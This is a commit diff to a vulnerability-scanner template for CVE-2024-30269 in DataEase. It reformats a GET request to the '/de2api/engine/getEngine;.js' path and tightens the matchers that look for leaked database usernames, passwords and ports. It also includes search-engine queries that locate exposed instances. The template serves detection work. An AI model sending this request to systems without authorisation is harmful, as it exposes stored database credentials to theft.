Update CVE-2024-30269.yaml
parent
a95e83b154
commit
84f8575ac3
|
@ -25,18 +25,17 @@ info:
|
|||
product: dataease
|
||||
fofa-query: body="dataease"
|
||||
shodan-query: http.html:"dataease"
|
||||
tags: cve,cve2024,dataease,info-leak
|
||||
tags: cve,cve2024,dataease,exposure
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /de2api/engine/getEngine;.js HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/de2api/engine/getEngine;.js"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains_all(body,"username", "password", "port")'
|
||||
- 'contains_all(body, "username", "password", "port", "name\":", "pid\":")'
|
||||
- 'contains(content_type,"application/json")'
|
||||
- 'status_code == 200'
|
||||
condition: and
|
||||
|
|
Loading…
Reference in New Issue